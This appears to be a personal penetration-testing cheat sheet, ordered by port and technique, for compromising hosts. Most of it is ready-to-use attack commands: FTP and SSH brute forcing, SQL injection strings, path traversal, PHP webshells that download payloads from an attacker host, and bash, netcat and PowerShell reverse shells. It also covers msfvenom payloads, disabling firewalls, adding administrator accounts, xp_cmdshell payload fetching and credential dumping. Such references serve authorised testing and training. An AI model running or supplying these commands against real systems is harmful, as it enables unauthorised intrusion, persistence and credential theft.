I've been a bit busy with a new schedule. Please bear with me as some of the items below are not yet updated.

7/28/18: Fixed content bugs

PORTS

21/990: FTP
Nmap: Anonymous FTP
About: Attempt to gain access without authentication or through the anonymous user account by way of nmap. This often allows full access to almost all files and folders on a host
Usage: nmap --script=ftp-anon.nse (IP)
 

Metasploit: FTP anonymous scanner
About: Attempt to gain access without authentication or through the anonymous user account by way of nmap. This often allows full access to almost all files and folders on a host
Usage: msfconsole> use auxiliary/scanner/ftp/anonymous
 

Metasploit: FTP login scanner
About: Attempt to brute force authentication through the use of Metasploit. FTP access can sometimes lead to privilege escalation or display credential logs from a previous user
How: msfconsole> use auxiliary/scanner/ftp/login
 

Tips
Check xml, ini, log, and txt files for user passwords/hashes. Passwords and user logs are often left inside of these files which may lead to web or SSH access.
22: SSH
Hydra: Manual password bruteforcing
  • Flags:
    -l (single username) or -L (username list)
    -p (single password) or -P (password list)
    -t (number) - number of tasks to run, similar to multi-threading but instead reduces the amount of tasks running (default, 16)
    -f - stop the scanner once a valid username and password combo is found
    -v - verbosity mode (displays any extra output during the scan)
  • Example:
    hydra -l username -P password_list.txt 192.168.168.168 -f -v ssh
     
Tips
Use in conjunction with the cewl utility to grab possible names and passwords from a website (cewl usage can be found in the port 80 section below)
80/443/8080: HTTP/HTTPS/WebDAV
Dirb
About:
Usage: dirb http://192.168.168.168
Gobuster
About:
Usage: gobuster -u http://192.168.168.168/ -w /usr/share/seclists/Discovery/Web_Content/common.txt -s 200,204,301,302,307,403,500 –e
Nikto
About:
Usage: nikto –h 192.168.168.168 –p (port), nikto -h www.website.com
Curl
About:
Usage: curl http://192.168.168.168/admin.php?action=users&login=0
Cewl
About:
Usage: cewl http://192.168.168.168/index.html -m 2 -w cewl.lst
Davtest
About:
Usage: davtest –url http://(target IP) – will display what is executable
Cadaver
About:
Usage: cadaver http://(target IP), then run “ls” to list directories found
HTTP
  • Quick folder enumeration: nmap –script http-enum.nse –p80 192.168.168.168
  • SQLi - admin' or 1=1;# admin' or 1=1 #
    found username: username' or 1=1 #
  • nmap 192.168.168.168 --script=http-enum.nse -p80
  • http://192.168.168.168/search.php?id=../../../../../../../../../etc/passwd <-- can also run files, replace /etc/passwd with /upload/directory/blackwinter.php
Tips

  • PHP pages: Check for the presence of common php default pages and folders such as:
    /phpliteadmin
    /dashboard
    /admin
    /admin.php
    /login
    /login.php
  • If PHP is found, check the phpinfo.php file. On occasion hidden credentials will be located at the very bottom of the page
  • Check the /robots.txt file for hidden folders
  • Look for comments in the HTML source code. Programmers sometimes stick usernames, passwords, and other hints in there that may give you a way into the box
137/139/445: NetBIOS/SMB
Enum4linux
About:
Usage: enum4linux 192.168.168.168 add -U option to grab userlist
Smbclient
About:
Usage: smbclient -N -L 192.168.168.168 - lists smb type (often displaying samba version) and various shares
Accesschk
About:
Usage: accesschk -v -t (target IP) -u user -P /usr/share/dirb/wordlists/common.txt - attempts to connect to $IPC or $ADMIN shares
NetBIOS/SMB
  • nmap --script smb-vuln*.nse
  • nmap 192.168.168.168 --script=smb-vuln*.nse location: /usr/share/nmap/scripts/smb-vuln*.nse
Tips
Placeholder text
161: SNMP (UDP)
Snmpwalk
About:
Usage: snmpwalk -c public -v1 192.168.168.168 - used against snmp ports on udp, very rarely ever tcp
Tips
Placeholder text
3306: mySQL
mySQL
  • SQL commands: select sys_exec('/bin/bash');
  • escalation: bash -p or sudo su
  • sqsh program: apt-get install sqsh freetds-bin freetds-common freetds-dev
  • usage:
    add to the bottom of freetds.conf:
    [hostname] host = 192.168.168.169
    port = 2600
    tds version = 8.0

edit ~/.sqshrc:
\set username=sa
\set password=password
\set style=vert
connect: sqsh -S hostname

Tips
Placeholder text

 

Tools/Techniques

PHP
Reverse shells
  • One line: /bin/bash -i > /dev/tcp/192.168.168.169/443 0<&1 2>&1
  • MSFvenom syntax: msfvenom -p php/meterpreter/reverse_tcp LHOST=192.168.168.168 LPORT=443 R > revshell.php
Execution through PHP webshell
  • <?php echo (`whoami`); ?>
  • <?php echo (`ls -l /tmp/`); ?>
  • <?php echo `ifconfig`; ?>
  • <?php echo `wget -O /upload/directory/payload.php http://192.168.168.168/blackwinter.php`; ?>
  • <?php echo shell_exec("fetch -o /upload/directory/payload.php http://192.168.168.168/blackwinter.php"); ?>
Tips
Shells
Breaking out of shells
  • Non-interactive shells
    to break out of non-interactive mode: in /tmp folder
    echo “import pty; pty.spawn(‘/bin/bash’)” > /tmp/test.py
    python /tmp/test.py
  • upgrade non-tty to tty: python -c ‘import pty;pty.spawn(“/bin/sh”)’
  • Escape limited shell - Bash:
    echo os.system(‘/bin/sh’) OR echo os.system(‘/bin/bash’)
  • Escape limited shell - Python:
    exit_code = os.system('/bin/sh') output = os.open('/bin/sh').read()
Kali webshells
  • /usr/share/webshells/php/php-reverse-shell.php
  • /usr/share/webshells/cfm/cfexec.cfm
  • /usr/share/webshells/perl/perl-reverse-shell.pl
ASP
msfvenom -p windows/shell_reverse_tcp LHOST=192.168.168.168 LPORT=443 -f asp -o shell.asp - also works for exporting .aspx
Reverse connections
  • echo $secpasswd = ConvertTo-SecureString "password" -AsPlainText -Force > wget-runas.ps1
    echo $mycreds = New-Object System.Management.Automation.PSCredential ("username", $secpasswd) >> wget-runas.ps1
    echo $computer = "hostname" >> wget-runas.ps1
    echo [System.Diagnostics.Process]::Start("C:\tmp\nc.exe","192.168.168.168 443 -e cmd.exe", $mycreds.Username, $mycreds.Password, $computer) >> wget-runas.ps1
    powershell.exe -ExecutionPolicy Bypass -NoLogo -NonInteractive -NoProfile -File wget-runas.ps1
  • Linux: os.system('nc 192.168.168.168 443 -e /bin/sh')
  • Windows: nc -nlvp 443 -e cmd.exe
Firewall
Linux: Disable firewall
  • systemctl stop firewalld
  • iptables -F
Windows: Disable firewall
  • Check firewall state: netsh firewall show state
  • Turn off through PHP web shell: system(‘netsh firewall show state’);
  • Turn firewall off: netsh advfirewall set allprofiles state off
  • netsh firewall set opmode disable
Tips
RDP
Enable RDP through the command line
reg add "hklm\system\currentControlSet\Control\Terminal Server" /v "AllowTSConnections" /t REG_DWORD /d 0x1 /f
if terminal services are disabled: sc config TermService start= "demand"
net start TermService
Mount linux share
rdesktop -u username -p password -r disk:share=/home//Desktop 192.168.168.168
Add users
Windows: net user username password /add
net localgroup Administrators username /add
net localgroup "Remote Desktop Users" username /add
Tips
SQL
Execution
Check files
1> exec master..xp_cmdshell 'type c:\"Documents and Settings"\Administrator\Desktop\proof.txt'
2> go
Upload and connect to reverse shell
1> EXEC master..xp_cmdshell 'tftp -i 192.168.168.168 GET nc.exe'
2> go
[email protected]:~# sqsh -S hostname -Uusername -Ppassword
1> EXEC master..xp_cmdshell 'nc -nlvp 443'
2> go
1> EXEC master..xp_cmdshell 'nc -nv 192.168.168.168 443 -e cmd'
2> go
Output a table
1> use database;
2> go
1> select * from tblTable;
2> go
MySQL
select sys_exec(‘/bin/bash’);
after bash access, “bash –p” or “sudo su”
Injection
admin’ or 1=1;#
admin’ or 1=1 #
Tips
File Transfer
Execution
<?php echo `wget -O /upload/directory/payload.php http://192.168.168.168/blackwinter.php`; ?>
<?php echo shell_exec("fetch -o /upload/directory/payload.php http://192.168.168.168/blackwinter.php"); ?>
fetch
ftp
tftp
nmap 192.168.168.168 -p80 --script http-methods --script-args http-methods.url-path='/upload_path'
nmap 192.168.168.168 -p80 --script http-put --script-args http-put.url='/upload_path/reverse_shell.php',http-put.file='/blackwinter.php'
Wget: wget http://192.168.168.168/filename - wget http://192.168.168.168/blackwinter.php
Powershell
  • Upload netcat to the victim:

  • Run reverse netcat connection and connect to attacker:
    Code courtesy of badc0d3

Tips
Password and Hash Cracking
Identify hashes: hash-identifier
About: Identify types of hashes (only identifies, does not crack)
Usage: hash-identifier, then paste in hash
 

Unshadow
unshadow password_file shadow_file > new_password_list
Crack hashes: John the ripper
About: Used to crack different types of hashes (use with a wordlist for better results)
Usage:
[email protected]:~# john --wordlist=/usr/share/wordlists/rockyou.txt --format=Raw-SHA256 password_list
 

Bruteforce: Hydra
hydra –l (found_name) –P password.lst 192.168.168.168 ssh
hydra -L username_list.txt -P password_list.txt 192.168.168.168 ssh -t 4
Misconfigured AD
net use z: \\(target_hostname)\SYSVOL
dir /s Groups.xml
type Z:\local.domain\Policies\{84583021-C460-486C-83E1- FA1EC8CA84FC}\Machine\Preferences\Groups\Groups.xml
gpp-decrypt SvtusBQWJgAFrFPTyPH9clizXPQBDqDDGzlSDxKogcz, password will be outputted
SAM Cracking: WCE32/WCE64
About: wce32.exe (wce64.exe) can be used to attempt cracking of user passwords in memory
Usage: wce32.exe -w (wce64.exe -w)
 

SAM Cracking: FGdump
About: FGdump.exe can be used to crack local SAM hashes in memory. The program uses the IPC$ share to connect and additionally attempts to disable antivirus that may be running on the host
Usage: fgdump.exe, then "type 127.0.0.1.pwdump"
 

 

SAM Cracking: PWdump
About: PWdump.exe can be used to crack local SAM hashes in memory. Does not have the added bonus like FGdump of disabling antivirus. This will need to be done prior to running the program
Usage: pwdump.exe (host)
 

 
Tips
Online hash crackers: